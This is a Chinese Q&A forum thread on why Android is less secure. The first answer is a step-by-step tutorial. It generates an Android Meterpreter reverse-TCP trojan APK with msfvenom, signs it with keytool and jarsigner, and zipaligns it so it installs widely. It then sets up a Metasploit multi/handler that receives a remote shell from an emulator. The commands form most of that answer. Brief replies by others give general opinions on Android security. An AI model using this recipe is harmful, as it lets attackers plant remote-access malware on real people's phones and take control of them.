咔擦娛樂
眾所周知,手機操作系統的兩大巨頭:安卓和蘋果。而安卓由於是開源系統,流暢性和安全性成為使用者口中經常吐槽的話題,流暢性從使用中我們可以得到驗證。那麼為什麼說安全性也比蘋果系統略勝一籌呢,怎麼才能看得出呢?現在小編就帶大家去驗證一下安卓手機的安全性問題。
老規矩,還是利用kali系統下集成的metasploit工具生成一個木馬
1、打開kali,輸入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST= “kali系統的IP”LPORT= “端口可自由設置,但不要設為已經固定的端口號” R > aaa.apk】。由安卓手機的安卓包都是以apk結尾的,所以要生成apk結尾的文件。
如果出現下圖的信息,就表示木馬文件已經生成,可以從根目錄下找到aaa.apk文件。
接著,需要創建木馬文件的證書和數字簽名,由於小編也沒有研究過安卓開發,只是知道安卓軟件安裝的時候需要用到這兩個東西,所以不能為題主和各位讀者解釋了,請見諒。
2、通過【keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999】命令,創建一個證書。
然後進行相關信息的配置,確認證書信息。
3、【jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa】,創建數字簽名。
為了保證木馬能夠在大多數安卓手機安裝運行,需要對木馬文件進行優化
4、先安裝zipalign工具,安裝的命令是【apt-get install zipalign】。
接著就可以對木馬文件進行優化了,命令是【zipalign -v 4 aaa.apk aaaa.apk】,如果出現報錯信息可以忽略。
5、打開安卓系統虛擬機,小編利用QQ把木馬文件傳到了虛擬機,暫時先不安裝。
6、使用【use exploit/multi/handler】加載攻擊模塊,【set payload android/meterpreter/reverse_tcp】選擇使用的payload模塊
然後在安卓虛擬機安裝木馬文件,並運行。
7、返回kali系統,執行攻擊命令【exploit】,就會發現返回木馬已經被執行了,證明已經獲取了安卓虛擬機權限,此時命令行會自動進入meterperter命令,輸了【help】命令可以查看安卓系統的操作指令。至此就完成了入侵安卓系統的基本操作了!
通過這個測試我們可以知道安卓系統由於對APP的審核不嚴格,導致大量非法的APP可以在手機上安裝並運行,造成手機卡頓,中毒等情況。相比之下,蘋果系統的審核力度是非常大的,想要在蘋果手機安裝的APP必須通過嚴格的審查並限制,所以蘋果手機在安全性方面的確比安卓手機更勝一籌。當然這只是小編的一點了解和想法,不能解釋的面面俱到,歡迎讀者在評論區留言,我們一起討論學習!
關注小編,我將定期為大家解答各類網絡安全的疑惑,並且為大家帶來網絡安全的實用技術。大家如果對網絡安全方面的問題也可以向小編提問,如果我知道的都會為大家竭力解答!需要安卓系統虛擬機安裝包的也可以私信小編"安卓虛擬機",我可以給大家提供。
深度安全
說不安全,那是要看跟誰做比較,對吧!也是相對而言,並不是絕對的! 相對蘋果封閉的系統,肯定會說不安全,但也只是相對而言。
而且,現在安卓各大廠商自帶的管家軟件已經很強大了,至少我沒聽說過誰的安卓手機被侵略了,出啥安全問題!反而,我聽到了很多關於蘋果的負面報道,比如什麼系統被破解盜刷財產等等.....
所以,不必糾結這個問題,你覺得好用就行了!
狂奔的月光
它的系統是開源的,並不是像蘋果系統閉源的,手機發燒友可以發揮體驗手機,可以隨意的刷機,只要手機不壞,所以安卓會定期更新安全補丁。
飛亦F
因為它的系統開放程度比較高,好玩但是漏洞也大,建議你可以在手機上安裝可靠的第三方安全防護軟件,諸如360手機衛士或者騰訊手機管家這樣的,增強手機系統安全能力。
給個優質回答謝謝
